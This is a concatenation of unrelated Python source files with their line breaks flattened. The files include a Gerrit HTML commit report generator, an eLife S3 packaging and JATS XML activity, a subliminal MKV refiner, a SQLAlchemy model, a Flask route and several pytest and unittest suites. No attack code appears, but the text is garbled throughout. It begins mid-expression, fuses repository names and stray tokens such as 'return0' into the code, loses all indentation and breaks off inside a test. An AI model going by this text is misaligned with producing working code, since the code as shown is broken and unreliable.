" result += """ """ # Generate a list of analyzed commits for commit in projectInfo.commitsInfo: result += HtmlGenerator.__generateCommitHtml( gerritUrl, projectGitwebUrl, projectInfo, commit ) result += "
Subject Commit Change Author

" return result @staticmethod def __generateCommitHtml(gerritUrl, gitwebUrl, projectInfo, commitInfo): """ Generate commit specific HTML @param gerritUrl Gerrit HTTP URL @param gitwebUrl Gitweb HTTP URL @param projectInfo Parent project info @param commitInfo Commit info """ result = "" # Default color (for commits ) changeStyle = None gerritChangeNumberText = "" commitGerritUrl = None # Commit on gerrit ? if commitInfo.gerritChangeInfo: gerritChangeNumberText = str(commitInfo.gerritChangeInfo.number) commitGerritUrl = gerritUrl + "/c/%d" % commitInfo.gerritChangeInfo.number if commitInfo.gerritChangeInfo.patchSetNumber: gerritChangeNumberText += "/" + str( commitInfo.gerritChangeInfo.patchSetNumber ) commitGerritUrl += "/%d" % commitInfo.gerritChangeInfo.patchSetNumber # We have the exact patchset number if commitInfo.gerritChangeInfo.status == ChangeStatus.MERGED: # Commit was merged changeStyle = "change_merged" else: # Commit was pulled, but not merged changeStyle = "change_pulled" else: # We found the commit on gerrit, but don't know the exact patchset (may have been cherry-picked) changeStyle = "change_cherrypicked" else: # Commit not on gerrit changeStyle = "change_local" result += '' % changeStyle # Title result += "%s" % commitInfo.title # Hash/gitweb URL commitGitwebUrl = gitwebUrl + "a=commit;h=" + commitInfo.hash result += ( ' %s' % (commitGitwebUrl, commitInfo.shortHash) ) # Change number/gerrit URL result += '' if commitGerritUrl: result += '%s' % ( commitGerritUrl, gerritChangeNumberText, ) else: result += gerritChangeNumberText result += "" # Author result += "%s" % commitInfo.author result += "" return result from sys import getsizeof import pytest from bourbaki.introspection.references import ( find_refs_by_size, find_refs_by_id, find_refs_by_type, ) l = ["foo", "bar", 1, 2, tuple(range(10))] class Foo: l = l x = 123.0 class Bar: __slots__ = ["x", "y"] def __init__(self, x): self.x = x @pytest.mark.parametrize( "obj,type_,value", [ (l, int, 1), (l, str, "foo"), (l, tuple, tuple(range(10))), (Foo, list, l), (Foo, float, 123.0), (Bar(l), list, l), ], ) def test_find_refs_by_type(obj, type_, value): refs = find_refs_by_type(obj, type_) path = next(refs) assert path(obj) == value @pytest.mark.parametrize("obj,size,value", [(l, getsizeof(tuple(range(10))), l[-1])]) def test_find_refs_by_size(obj, size, value): refs = find_refs_by_size(obj, size, attrs=False) path = next(refs) assert path(obj) == value @pytest.mark.parametrize( "obj,target,value", [(l, l[-1], l[-1]), (Foo, l, Foo.l), (Foo, Foo.x, Foo.x), (Bar(l), l, l)], ) def test_find_refs_by_id(obj, target, value): refs = find_refs_by_id(obj, target) path = next(refs) assert path(obj) == value import os import json import time import zipfile import glob import shutil import importlib from collections import OrderedDict from xml.parsers.expat import ExpatError from ejpcsvparser import parse from jatsgenerator import generate from jatsgenerator import conf as jats_conf from packagepoa import transform from packagepoa import conf as poa_conf from elifearticle.article import ArticleDate import provider.ejp as ejplib import provider.lax_provider as lax_provider from provider.storage_provider import storage_context from provider import email_provider, utils from activity.objects import Activity class activity_PackagePOA(Activity): "PackagePOA activity" def __init__(self, settings, logger, conn=None, token=None, activity_task=None): super(activity_PackagePOA, self).__init__( settings, logger, conn, token, activity_task ) self.name 
= "PackagePOA" self.version = "1" self.default_task_heartbeat_timeout = 30 self.default_task_schedule_to_close_timeout = 60 * 30 self.default_task_schedule_to_start_timeout = 30 self.default_task_start_to_close_timeout = 60 * 15 self.description = "Process POA zip file input, repackage, and save to S3." # Activity directories self.directories = OrderedDict( [ ("EJP_INPUT", os.path.join(self.get_tmp_dir(), "ejp_input")), ( "XML_OUTPUT", os.path.join(self.get_tmp_dir(), "generated_xml_output"), ), ("CSV", os.path.join(self.get_tmp_dir(), "csv_data")), ("CSV_TMP", os.path.join(self.get_tmp_dir(), "csv_data", "tmp")), ( "DECAPITATE_PDF", os.path.join(self.get_tmp_dir(), "decapitate_pdf_dir"), ), ("POA_TMP", os.path.join(self.get_tmp_dir(), "tmp")), ("OUTPUT", os.path.join(self.get_tmp_dir(), "output_dir")), ] ) # Create an EJP provider to access S3 bucket holding CSV files self.ejp = ejplib.EJP(settings, self.get_tmp_dir()) self.ejp_bucket = self.settings.ejp_bucket # Bucket for outgoing files self.publish_bucket = settings.poa_packaging_bucket self.outbox_folder = "outbox/" # Some values to set later self.document = None self.poa_zip_filename = None self.doi = None # Capture errors from generating XML self.error_count = None self.error_messages = None # Track the success of some steps self.activity_status = None self.approve_status = None self.process_status = None self.generate_xml_status = None self.pdf_decap_status = None def do_activity(self, data=None): """ Activity, do the work """ self.logger.info("data: %s" % json.dumps(data, sort_keys=True, indent=4)) # Create output directories self.make_activity_directories() # Download the S3 object self.document = data["data"]["document"] # Download POA zip file self.poa_zip_filename = self.download_poa_zip(self.document) # Get the DOI from the zip file self.doi = get_doi_from_zip_file(self.poa_zip_filename) doi_id = utils.msid_from_doi(self.doi) self.logger.info("DOI: %s" % doi_id) # Approve the DOI for packaging self.approve_status = approve_for_packaging(doi_id) if self.approve_status is False: # Bad. 
Fail the activity self.activity_status = False else: # Good, continue # Transform zip file self.process_status = self.process_poa_zipfile(self.poa_zip_filename) self.logger.info("Process status: %s" % self.process_status) self.pdf_decap_status = self.check_pdf_decap_failure() self.logger.info("PDF decapitation status: %s" % self.pdf_decap_status) # Set the DOI and generate XML self.download_latest_csv() pub_date = self.get_pub_date(doi_id) volume = utils.volume_from_pub_date(pub_date) try: self.generate_xml(doi_id, pub_date, volume) self.generate_xml_status = True except Exception as exception: self.logger.exception("Exception in generate_xml: %s" % str(exception)) self.generate_xml_status = False self.logger.info("XML generation status: %s" % self.generate_xml_status) # Copy finished files to S3 outbox self.copy_files_to_s3_outbox() # Set the activity status of this activity based on successes self.activity_status = bool( self.process_status is True and self.pdf_decap_status is True and self.generate_xml_status is True ) # Send email self.send_email() # Return the activity result, True or False result = True if self.activity_status is True: self.clean_tmp_dir() # reload the ejpcsvparser/csv_data.py module to clear cached CSV data importlib.reload(parse.data) return result def clean_tmp_dir(self): "custom cleaning of temp directory in order to retain some files for debugging purposes" keep_dirs = ["CSV", "CSV_TMP"] for dir_name, dir_path in self.directories.items(): if dir_name in keep_dirs or not os.path.exists(dir_path): continue shutil.rmtree(dir_path) def get_pub_date(self, doi_id): # Get the date for the first version date_struct = None date_str = lax_provider.article_publication_date( utils.pad_msid(doi_id), self.settings, self.logger ) if date_str is not None: date_struct = time.strptime(date_str, "%Y%m%d000000") else: # Use current date date_struct = time.gmtime() return date_struct def download_poa_zip(self, document): """ Given the s3 object name as document, download it from the POA delivery bucket and save file to disk in the EJP_INPUT dir """ bucket_name = self.settings.poa_bucket storage = storage_context(self.settings) storage_provider = self.settings.storage_provider + "://" orig_resource = storage_provider + bucket_name + "/" storage_resource_origin = orig_resource + document filename_plus_path = os.path.join(self.directories.get("EJP_INPUT"), document) try: with open(filename_plus_path, "wb") as open_file: storage.get_resource_to_file(storage_resource_origin, open_file) except IOError: return None return filename_plus_path def packagepoa_config(self, config_section): "parse the config values from the jatsgenerator config" return poa_conf.parse_raw_config( poa_conf.raw_config(config_section, self.settings.packagepoa_config_file) ) def process_poa_zipfile(self, poa_zip_filename): """ Using the POA transform-ejp-zip-to-hw-zip module """ if poa_zip_filename is None: return False poa_config = self.packagepoa_config(self.settings.packagepoa_config_section) # override the output directories poa_config["output_dir"] = self.directories.get("OUTPUT") poa_config["decapitate_pdf_dir"] = self.directories.get("DECAPITATE_PDF") poa_config["tmp_dir"] = self.directories.get("POA_TMP") try: transform.process_zipfile( zipfile_name=poa_zip_filename, poa_config=poa_config ) return True except zipfile.BadZipfile: return False def check_pdf_decap_failure(self): """ After processing the zipfile there should be a PDF present, as a result of decapitating the file. 
If not, return false """ pdf_files = glob.glob(self.directories.get("DECAPITATE_PDF") + "/*.pdf") if not pdf_files: return False return True def download_latest_csv(self): """ Download the latest CSV files from S3, rename them, and save to the CSV directory """ # Key: File types, value: file to save as to disk file_types = { "poa_author": "poa_author.csv", "poa_license": "poa_license.csv", "poa_manuscript": "poa_manuscript.csv", "poa_received": "poa_received.csv", "poa_subject_area": "poa_subject_area.csv", "poa_research_organism": "poa_research_organism.csv", "poa_abstract": "poa_abstract.csv", "poa_title": "poa_title.csv", "poa_keywords": "poa_keywords.csv", "poa_group_authors": "poa_group_authors.csv", "poa_datasets": "poa_datasets.csv", "poa_funding": "poa_funding.csv", "poa_ethics": "poa_ethics.csv", } for file_type, filename in list(file_types.items()): # Download s3_key_name = self.ejp.find_latest_s3_file_name(file_type) bucket_name = self.settings.ejp_bucket storage = storage_context(self.settings) storage_provider = self.settings.storage_provider + "://" orig_resource = storage_provider + bucket_name + "/" try: storage_resource_origin = orig_resource + s3_key_name except TypeError: self.logger.info( "PackagePoA unable to download CSV file for {file_type}".format( file_type=file_type ) ) continue filename_plus_path = os.path.join(self.directories.get("CSV"), filename) with open(filename_plus_path, "wb") as open_file: storage.get_resource_to_file(storage_resource_origin, open_file) # log last modified date if available s3_key = storage.get_resource_as_key(storage_resource_origin) self.logger.info( "CSV file %s last_modified: %s" % ( storage_resource_origin, getattr(s3_key, "last_modified", "[unknown]"), ) ) def jatsgenerator_config(self, config_section): "parse the config values from the jatsgenerator config" return jats_conf.parse_raw_config( jats_conf.raw_config( config_section, self.settings.jatsgenerator_config_file ) ) def generate_xml(self, article_id, pub_date=None, volume=None): """ Given DOI number as article_id, use the POA library to generate article XML from the CSV files """ # override the CSV directory in the ejp-csv-parser library jats_config = self.jatsgenerator_config( self.settings.jatsgenerator_config_section ) parse.data.CSV_PATH = self.directories.get("CSV") + os.sep parse.data.TMP_DIR = self.directories.get("CSV_TMP") article = None try: article, self.error_count, self.error_messages = parse.build_article( article_id ) except Exception as exception: self.logger.exception( "Exception in build_article for article_id %s: %s" % (article_id, str(exception)) ) raise # check for errors if self.error_count and self.error_count > 0: exception_message = ( "Exception raised in generate_xml, error count: %s, error_messages: %s" % (self.error_count, ", ".join(self.error_messages)) ) self.logger.exception(exception_message) raise Exception(exception_message) if article: # Here can set the pub-date and volume, if provided if pub_date: pub_date_object = ArticleDate("pub", pub_date) article.add_date(pub_date_object) if volume: article.volume = volume # Override the output_dir in the jatsgenerator config jats_config["target_output_dir"] = self.directories.get("XML_OUTPUT") try: generate.build_xml_to_disk(article_id, article, jats_config, True) except ExpatError as exception: self.logger.exception( "Exception in build_xml_to_disk for article_id %s: %s" % (article_id, str(exception)) ) raise # Copy to output_dir because we need it there xml_files = 
glob.glob(self.directories.get("XML_OUTPUT") + "/*.xml") for xml_file in xml_files: shutil.copy(xml_file, self.directories.get("OUTPUT")) def copy_files_to_s3_outbox(self): """ Copy local files to the S3 bucket outbox """ # TODO: log which files will be created pdf_files = glob.glob(self.directories.get("DECAPITATE_PDF") + "/*.pdf") for file_name_path in pdf_files: # Copy decap PDF to S3 outbox self.copy_file_to_bucket(file_name_path) xml_files = glob.glob(self.directories.get("XML_OUTPUT") + "/*.xml") for file_name_path in xml_files: # Copy XML file to S3 outbox self.copy_file_to_bucket(file_name_path) zip_files = glob.glob(self.directories.get("OUTPUT") + "/*.zip") for file_name_path in zip_files: # Copy supplements zip file to S3 outbox self.copy_file_to_bucket(file_name_path) def copy_file_to_bucket(self, file_name_path): """ Given a boto bucket (already connected) and path to the file, copy the file to the publish_bucket using the same filename """ # Get the file name from the full file path file_name = file_name_path.split(os.sep)[-1] # Create S3 object and save bucket_name = self.publish_bucket storage = storage_context(self.settings) storage_provider = self.settings.storage_provider + "://" s3_folder_name = self.outbox_folder resource_dest = ( storage_provider + bucket_name + "/" + s3_folder_name + file_name ) storage.set_resource_from_filename(resource_dest, file_name_path) self.logger.info("Copied %s to %s", file_name_path, resource_dest) def send_email(self): """ After do_activity is finished, send emails to recipients on the status """ current_time = time.gmtime() body = self.get_email_body(current_time) subject = self.get_email_subject(current_time) sender_email = self.settings.ses_poa_sender_email recipient_email_list = email_provider.list_email_recipients( self.settings.ses_poa_recipient_email ) for email in recipient_email_list: # send the email by SMTP message = email_provider.simple_message( sender_email, email, subject, body, logger=self.logger ) email_provider.smtp_send_messages( self.settings, messages=[message], logger=self.logger ) self.logger.info( "Email sending details: admin email, email %s, to %s" % ("PackagePOA", email) ) return True def get_email_subject(self, current_time): """ Assemble the email subject """ date_format = "%Y-%m-%d %H:%M" datetime_string = time.strftime(date_format, current_time) activity_status_text = utils.get_activity_status_text(self.activity_status) subject = ( self.name + " " + activity_status_text + " doi: " + str(self.doi) + ", " + datetime_string + ", eLife SWF domain: " + self.settings.domain ) return subject def get_email_body(self, current_time): """ Format the body of the email """ body = "" datetime_string = time.strftime(utils.DATE_TIME_FORMAT, current_time) activity_status_text = utils.get_activity_status_text(self.activity_status) # Bulk of body body += self.name + " status:" + "\n" body += "\n" body += activity_status_text + "\n" body += "\n" body += "document: " + str(self.document) + "\n" body += "doi: " + str(self.doi) + "\n" body += "\n" body += "activity_status: " + str(self.activity_status) + "\n" body += "approve_status: " + str(self.approve_status) + "\n" body += "process_status: " + str(self.process_status) + "\n" body += "pdf_decap_status: " + str(self.pdf_decap_status) + "\n" body += "generate_xml_status: " + str(self.generate_xml_status) + "\n" if self.error_count and self.error_count > 0: body += "\n" body += "XML generation errors:" + "\n" body += "error_count: " + str(self.error_count) + "\n" body += 
"error_messages: " + ", ".join(self.error_messages) + "\n" body += "\n" body += "SWF workflow details: " + "\n" body += "activityId: " + str(self.get_activityId()) + "\n" body += "As part of workflowId: " + str(self.get_workflowId()) + "\n" body += "As at " + datetime_string + "\n" body += "Domain: " + self.settings.domain + "\n" body += "\n" body += "\n\nSincerely\n\neLife bot" return body def get_doi_from_zip_file(filename=None): """ Get the DOI from the zip file manifest.xml using the POA library Use the object variable as the default if not specified """ if filename is None: return None # Good, continue try: with zipfile.ZipFile(filename, "r") as current_zipfile: return transform.get_doi_from_zipfile(current_zipfile) except zipfile.BadZipfile: return None def approve_for_packaging(doi_id): """ After downloading the zip file but before starting to package it, do all the pre-packaging steps and checks, including to have a DOI """ if doi_id is None: return False return True jippo015/Sub-Zero.bundle # -*- coding: utf-8 -*- import logging import os from babelfish import Error as BabelfishError, Language from enzyme import MKV logger = logging.getLogger(__name__) def refine(video, embedded_subtitles=True, **kwargs): """Refine a video by searching its metadata. Several :class:`~subliminal.video.Video` attributes can be found: * :attr:`~subliminal.video.Video.resolution` * :attr:`~subliminal.video.Video.video_codec` * :attr:`~subliminal.video.Video.audio_codec` * :attr:`~subliminal.video.Video.subtitle_languages` :param bool embedded_subtitles: search for embedded subtitles. """ # skip non existing videos if not video.exists: return # check extensions extension = os.path.splitext(video.name)[1] if extension == '.mkv': with open(video.name, 'rb') as f: mkv = MKV(f) # main video track if mkv.video_tracks: video_track = mkv.video_tracks[0] # resolution if video_track.height in (480, 720, 1080): if video_track.interlaced: video.resolution = '%di' % video_track.height else: video.resolution = '%dp' % video_track.height logger.debug('Found resolution %s', video.resolution) # video codec if video_track.codec_id == 'V_MPEG4/ISO/AVC': video.video_codec = 'h264' logger.debug('Found video_codec %s', video.video_codec) elif video_track.codec_id == 'V_MPEG4/ISO/SP': video.video_codec = 'DivX' logger.debug('Found video_codec %s', video.video_codec) elif video_track.codec_id == 'V_MPEG4/ISO/ASP': video.video_codec = 'XviD' logger.debug('Found video_codec %s', video.video_codec) else: logger.warning('MKV has no video track') # main audio track if mkv.audio_tracks: audio_track = mkv.audio_tracks[0] # audio codec if audio_track.codec_id == 'A_AC3': video.audio_codec = 'AC3' logger.debug('Found audio_codec %s', video.audio_codec) elif audio_track.codec_id == 'A_DTS': video.audio_codec = 'DTS' logger.debug('Found audio_codec %s', video.audio_codec) elif audio_track.codec_id == 'A_AAC': video.audio_codec = 'AAC' logger.debug('Found audio_codec %s', video.audio_codec) else: logger.warning('MKV has no audio track') # subtitle tracks if mkv.subtitle_tracks: if embedded_subtitles: embedded_subtitle_languages = set() for st in mkv.subtitle_tracks: if st.language: try: embedded_subtitle_languages.add(Language.fromalpha3b(st.language)) except BabelfishError: logger.error('Embedded subtitle track language %r is not a valid language', st.language) embedded_subtitle_languages.add(Language('und')) elif st.name: try: embedded_subtitle_languages.add(Language.fromname(st.name)) except BabelfishError: logger.debug('Embedded 
subtitle track name %r is not a valid language', st.name) embedded_subtitle_languages.add(Language('und')) else: embedded_subtitle_languages.add(Language('und')) logger.debug('Found embedded subtitle %r', embedded_subtitle_languages) video.subtitle_languages |= embedded_subtitle_languages else: logger.debug('MKV has no subtitle track') else: logger.debug('Unsupported video extension %s', extension) from typing import Optional from sqlalchemy.orm import relationship from sqlalchemy.ext.hybrid import hybrid_property from sqlalchemy import Column, Integer, String, Unicode, UnicodeText, Numeric, DateTime, SmallInteger, Boolean, select from py_reportit.shared.model.orm_base import Base from py_reportit.shared.model.report_answer import ReportAnswer from py_reportit.shared.util.anonymiser import anonymise class Report(Base): __tablename__ = 'report' id = Column(Integer, primary_key=True) title = Column(Unicode(255)) description = Column(UnicodeText) has_photo = Column(Boolean) latitude = Column(Numeric(8,6)) longitude = Column(Numeric(9,6)) created_at = Column(DateTime) updated_at = Column(DateTime) key_category = Column(String(100)) id_service = Column(SmallInteger) status = Column(Unicode(50)) answers = relationship("ReportAnswer", uselist=True, backref="report") meta = relationship("Meta", uselist=False, backref="report") @property def description_anon(self) -> str: if self.description: return anonymise(self.description) return "" @hybrid_property def service(self) -> Optional[str]: if len(self.answers): return sorted(self.answers, key=lambda answer: answer.order)[-1].author return None @service.expression def service(cls): return select(ReportAnswer.author).where(ReportAnswer.report_id == cls.id).order_by(ReportAnswer.order.desc()).limit(1).as_scalar() def __repr__(self): return f'' @property def has_title(self): return self.title != None and self.title != "" and self.title != "title" 0 # !/usr/bin/python3 # Completely pointless but necessary for a package DominusTea/Distrib-ToyChordsource/routers.py from __main__ import app # a simple page that says hello @app.route('/hello') def hello(): return 'Hello, World!'+str(app.config["BOOTSTRAP_IP"]) src/lsa_prep.py import numpy as np import pandas as pd from scipy.sparse import load_npz from stuff.tools import tfidf_to_counts, decompose # Importing the data filedir = 'C:/data/addm/' seeds = np.array(pd.read_csv(filedir + 'seeds.csv')).flatten() corpus = pd.read_csv(filedir + 'corpus_with_lemmas_clean.csv') doctermat = load_npz(filedir + 'doctermat.npz') # Setting the features and targets X = np.array(doctermat.todense(), dtype=np.uint16) y = np.array(corpus.aucaseyn, dtype=np.uint8) n_range = range(corpus.shape[0]) # Doing the decommpositions svd_10 = decompose(X, n_features=10) svd_25 = decompose(X, n_features=25) svd_50 = decompose(X, n_features=50) svd_100 = decompose(X, n_features=100) svd_200 = decompose(X, n_features=200) # Saving the decompositions np.save(filedir + 'svd_10', svd_10) np.save(filedir + 'svd_25', svd_25) np.save(filedir + 'svd_50', svd_50) np.save(filedir + 'svd_100', svd_100) np.save(filedir + 'svd_200', svd_200) import os import json import ujson from jsonlines import jsonlines from torch.utils.tensorboard import SummaryWriter from bootleg.utils import train_utils class StatusReporter: def __init__(self, args, logger, is_writer, max_epochs, total_steps_per_epoch, is_eval): self.format_str = 'epoch {}, step {}/{}, loss = {:.6f} ({:.3f} sec/batch | {:.3f} sec/batch LOAD), lr: {:.6f}' self.logger = logger self.is_writer = 
is_writer self.max_epochs = max_epochs self.total_steps_per_epoch = total_steps_per_epoch self.dev_files = {} self.loss_file = "" self.test_files = {} if not is_eval: self.dev_files = self.setup_dev_files(args) self.loss_file = self.setup_loss_file(args) else: self.test_files = self.setup_test_files(args) self.tb_writer = self.setup_tensorboard(args) def setup_tensorboard(self, args): save_folder = os.path.join(train_utils.get_save_folder(args.run_config), "tensorboard") return SummaryWriter(log_dir=save_folder) def setup_test_files(self, args): test_files = {} save_folder = train_utils.get_save_folder(args.run_config) test_file_tag = args.data_config.test_dataset.file.split('.jsonl')[0] test_file = test_file_tag + "_test_results" test_file += train_utils.get_file_suffix(args) test_file += '.jsonl' test_file = os.path.join(save_folder, test_file) # Clear old file open(test_file, 'w').close() test_files[args.data_config.test_dataset.file] = test_file return test_files def setup_dev_files(self, args): dev_files = {} save_folder = train_utils.get_save_folder(args.run_config) dev_file_tag = args.data_config.dev_dataset.file.split('.jsonl')[0] dev_file = dev_file_tag + "_dev_results" dev_file += train_utils.get_file_suffix(args) dev_file += '.jsonl' dev_file = os.path.join(save_folder, dev_file) # Clear old file open(dev_file, 'w').close() dev_files[args.data_config.dev_dataset.file] = dev_file return dev_files def setup_loss_file(self, args): save_folder = train_utils.get_save_folder(args.run_config) loss_file = "loss_results" loss_file += train_utils.get_file_suffix(args) loss_file += '.jsonl' loss_file = os.path.join(save_folder, loss_file) open(loss_file, 'w').close() return loss_file def step_status(self, epoch, step, loss_pack, time, load_time, lr): self.logger.info(self.format_str.format(epoch, step, self.total_steps_per_epoch*self.max_epochs, loss_pack.loss.data.item(), time, load_time, lr)) if self.is_writer: self.dump_loss(epoch, step, loss_pack.loss_dict) self.tb_writer.add_scalar(tag="loss", scalar_value=loss_pack.loss.data.item(), global_step=step) self.tb_writer.add_scalar(tag="lr", scalar_value=lr, global_step=step) return def dump_loss(self, epoch, step, loss_dict): if self.is_writer: with open(self.loss_file, 'a') as f: loss_dict["epoch"] = epoch loss_dict["step"] = step ujson.dump(loss_dict, f) f.write('\n') return def dump_results(self, dict_for_dumping, file, is_test): if self.is_writer: if is_test: assert file in self.test_files, f'The dump file {file} is not in our possible files from {self.test_files.keys()}' else: assert file in self.dev_files, f'The dump file {file} is not in our possible files from {self.dev_files.keys()}' if not is_test: file = self.dev_files[file] file_mode = 'a' else: file = self.test_files[file] file_mode = 'a' with jsonlines.open(file, file_mode) as f: for json_obj in dict_for_dumping: train_head = json_obj["train_head"] eval_slice = json_obj["eval_slice"] tag = "/".join([train_head, eval_slice]) self.tb_writer.add_scalar(tag=tag, scalar_value=json_obj["f1_micro"], global_step=json_obj["global_step"]) f.write(json_obj) return0 import os import unittest import numpy as np try: import mock except ModuleNotFoundError: from unittest import mock from ddt import data, unpack, ddt from .. import models from .. import io from . 
import DATA_DIR @ddt class TestCODA(unittest.TestCase): def setUp(self): self.inst = inst = models.CODA() characteristics = [] self.values = values = 1, 10, 2, 7.5, 0.3 for x in values: char = mock.Mock() char.value = x characteristics.append(char) inst._characteristics = tuple(characteristics) requirements = [] self.weights = weights = 0.2, 0.1, 0.4, 0.3 for wt in weights: reqt = mock.Mock() reqt.weight = wt requirements.append(reqt) inst._requirements = tuple(requirements) correlation = np.array([[0.1, 0.0, 0.9, 0.3, 0.1], [0.0, 0.9, 0.3, 0.1, 0.1], [0.9, 0.3, 0.1, 0.1, 0.0], [0.3, 0.1, 0.1, 0.0, 0.9]]) self.correlation = correlation # Dummy merit values (these would normally be a fraction). self.merit = np.array([[24, 85, 78, 17, 5], [99, 7, 3, 88, 13], [41, 63, 52, 17, 31], [51, 95, 53, 60, 36]]) class MockRelationship(object): merit_preset = None def __call__(self, x): return self._merit_preset for i in range(correlation.shape[0]): for j in range(correlation.shape[1]): relationship = MockRelationship() relationship.correlation = correlation[i,j] relationship._merit_preset = self.merit[i,j] inst.matrix[i,j] = relationship # ---------------------------------------------------------------- # Test properties # ---------------------------------------------------------------- def test_matrix__unset(self): """Matrix should match shape and contain CODANull by default. """ temp_inst = models.CODA() self.assertEqual(temp_inst.matrix.shape, (0, 0)) self.assertEqual(self.inst.matrix.shape, (4, 5)) temp_inst._requirements += (object(),) self.assertEqual(temp_inst.matrix.shape, (1, 0)) for i, j in zip(*map(range, temp_inst.matrix.shape)): self.assertIsInstance(temp_inst.matrix[i,j], models.CODANull) def test_characteristics__default(self): """Should be an empty tuple by default.""" temp_inst = models.CODA() self.assertIsInstance(temp_inst.characteristics, tuple) self.assertEqual(len(temp_inst.characteristics), 0.0) self.assertEqual(len(self.inst.requirements), 4) def test_correlation(self): """Property converts correlation values in array to a matrix. Each design relationship models a correlation between a requirement and a characteristic parameter. This should therefore be the same dimensions as the overall coda model, i.e. (n, m) where n is the number of requirements, and m the number of characteristics. """ self.assertIsInstance(self.inst.correlation, np.ndarray) self.assertEqual(self.inst.correlation.ndim, 2) self.assertEqual(self.inst.correlation.shape, self.inst.shape) self.assertTrue((self.inst.correlation==self.correlation).all()) @mock.patch.object(models.CODA, 'satisfaction', new_callable=mock.PropertyMock) def test_merit(self, patch): """Sum total of weighted requirement satisfaction.""" patch.return_value = np.arange(5) self.assertAlmostEqual(self.inst.merit, 10) def test_parameter_value(self): """A row vector containing characteristic parameter values. Characteristics are considered to be columns in the underlying coda matrix, so characterstic parameter values should reflect this to be unambiguous. 
""" self.assertIsInstance(self.inst.parameter_value, np.ndarray) self.assertEqual(self.inst.parameter_value.shape, (1, self.inst.shape[1])) self.assertTrue((self.inst.parameter_value==self.values).all()) @data( (np.array([2.0, 10, 2, 7.5, 0.3]), None), (np.array([[2.0, 10, 2, 7.5, 0.3]]), None), (np.array([[2.0, 10, 2, 7.5, 0.3]]).T, None), ([2.0, 10, 2, 7.5, 0.3], None), (tuple([2.0, 10, 2, 7.5, 0.3]), None), (set([2.0, 10, 2, 7.5, 0.3]), ValueError), ([2.0, 10, 2, 7.5], ValueError), ) @unpack def test_parameter_value__set(self, value, exception): self.assertEqual(self.inst.parameter_value[0,0], 1.0) if exception is not None: self.assertRaises(exception, setattr, self.inst, 'parameter_value', value) else: setattr(self.inst, 'parameter_value', value) self.assertEqual(self.inst.parameter_value[0,0], 2.0) def test_requirements__default(self): """Should be an empty tuple by default.""" temp_inst = models.CODA() self.assertIsInstance(temp_inst.characteristics, tuple) self.assertEqual(len(temp_inst.characteristics), 0.0) self.assertEqual(len(self.inst.requirements), 4) @mock.patch.object(models.CODA, '_merit') @mock.patch.object(models.CODA, 'correlation', new_callable=mock.PropertyMock) def test_satisfaction(self, *mocks): """Weighted requirement satisfactions. This is the merit of each characteristic parameter value for each requirement, weighted by correlation factors. .. math: \frac{\sum_{j=1}^{M} cf .* \eta}{{scf}_i} Where i = [1..n] j = [1..m] and n = number of requirements m = number of characteristics """ correlation, merit = mocks a = np.random.rand(3,2) correlation.return_value = merit.return_value = a # numerator num = np.multiply(a, a).sum(axis=1, keepdims=True) # denominator den = a.sum(axis=1, keepdims=True) expected = np.divide(num, den) self.assertIsInstance(self.inst.satisfaction, np.ndarray) self.assertEqual(self.inst.satisfaction.shape, (3, 1)) np.testing.assert_array_almost_equal(self.inst.satisfaction, expected) def test_shape(self): """Reflects the number of characteristics & requirements. A CODA model involves n requirements and m characteristics, modelled as an (n, m) array/matrix. """ self.assertEqual(self.inst.shape, (4, 5)) def test_weight(self): """A column vector containing requirement weightings. Requirements are considered to be rows in the underlying coda matrix, so requirement weights should reflect this to be unambiguous. """ self.assertIsInstance(self.inst.weight, np.ndarray) self.assertEqual(self.inst.weight.shape, (self.inst.shape[0], 1)) # Note we must transpose the weight column vector to compare # it properly with the simple input weights tuple because of # numpy broadcasting producing a boolean matrix. 
self.assertTrue((self.inst.weight.T==self.weights).all()) # ---------------------------------------------------------------- # Test methods # ---------------------------------------------------------------- @data( #[('Irrelevant requirement', 0.0, ValueError),], # not enforced [('Unimportant requirement', 0.1, None),], [('Important requirement', 0.9, None),], [('Unimportant requirement', 0.1, None), ('Important requirement', 0.9, None),], [('Sole requirement', 1.0, None),], [('Sole requirement', 1.0, None), ('Another requirement', 0.1, RuntimeError)], ) def test_add_requirement__prenormalised(self, reqts): inst = models.CODA() i = 0 for (name, normwt, exception) in reqts: if exception is None: inst.add_requirement(name, normwt, normalise=False) i += 1 self.assertEqual(len(inst.requirements), i) self.assertEqual(inst.requirements[i-1].name, name) self.assertEqual(inst.requirements[i-1].weight, normwt) else: self.assertRaises(exception, inst.add_requirement, name, normwt, normalise=False) @data( (1.0, 1.0), (1.0, 1.0, 1.0, 1.0), (0.1, 0.2, 0.3, 0.4) ) def test_add_requirement__unnormalised(self, weights): inst = models.CODA() for i, wt in enumerate(weights): inst.add_requirement('Blah'+str(i), wt, normalise=True) self.assertAlmostEqual( sum([r.weight for r in inst.requirements]), 1.0 ) @data( [('Characteristic', 0.0, 1.0, None, None),], [('Characteristic', 0.0, 1.0, 1.0, None), ('Another characteristic', -1.0, 11.0, None, None),], ) def test_add_characteristic(self, chars): inst = models.CODA() i = 0 for (name, llim, ulim, value, exception) in chars: if exception is None: inst.add_characteristic(name, (llim, ulim), value) i += 1 self.assertEqual(len(inst.characteristics), i) self.assertEqual(inst.characteristics[i-1].name, name) self.assertEqual(inst.characteristics[i-1].limits, (llim, ulim)) # Value not set in these test data. #self.assertEqual(inst.characteristics[i-1].value, # value) else: self.assertRaises(exception, inst.add_characteristic, name, normwt) @data( [(0, 0, 'max', 0.1, 1.0, None, None),], [(0, 0, 'min', 0.1, 1.0, None, None),], [(0, 0, 'opt', 0.1, 1.0, 1.0, None),], [(0, 5, 'opt', 0.1, 1.0, 1.0, KeyError),], [(0, 0, 'max', 0.1, 1.0, None, None), (0, 1, 'max', 0.1, 1.0, None, None),], ) def test_add_relationship(self, rels): inst = self.inst for (r, c, type_, corr, tv, tol, exception) in rels: if type_ == 'opt': cls = models.CODAOptimise args = (r, c, type_, corr, tv, tol) else: args = (r, c, type_, corr, tv, tol) if type_ == 'max': cls = models.CODAMaximise else: cls = models.CODAMinimise if exception is None: inst.add_relationship(*args) else: self.assertRaises(exception, inst.add_relationship, *args) continue self.assertIsInstance(inst.matrix[r,c], cls) self.assertEqual(inst.matrix[r,c].correlation, corr) @data( ['Requirement0', 0, None], [0, 'Characteristic0', None], ['requirement0', 0, KeyError], # Case-sensitive for now. ['Requirement2', 0, KeyError], # Not present. ['Requirement0', 'Characteristic0', None], ['Requirement1', 'Characteristic0', None], [1, 'Characteristic0', None], ) @unpack def test_add_relationship__by_name(self, rlkup, clkup, exception): """Given two requirements, 1 characteristic - add relations. 
